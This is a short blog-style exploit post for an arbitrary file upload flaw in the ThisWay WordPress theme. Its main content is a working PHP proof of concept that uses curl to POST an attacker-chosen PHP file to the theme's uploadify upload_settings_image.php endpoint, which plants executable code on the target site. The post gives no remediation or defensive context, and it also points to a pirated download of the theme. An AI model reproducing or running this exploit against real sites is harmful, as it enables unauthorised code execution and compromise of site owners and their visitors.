WordPress ThisWay Arbitrary File Upload



#- Title: WordPress ThisWay Arbitrary File Upload
#- Author: Bet0
#- Date: 11/01/2013  
#- Vendor: themeforest.net
#- Download Link: www.mafiashare.net/download/themeforest-this-way-v12-wp-full-video-image-background/
#- Tested on : Windows 7

Proof of Concept :

<?php
$uploadfile="3xploi7.php";
$ch = curl_init("http://3xploi7.blogspot.com/wp-content/themes/ThisWay/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

Result : Here


0 Response to "WordPress ThisWay Arbitrary File Upload"

Posting Komentar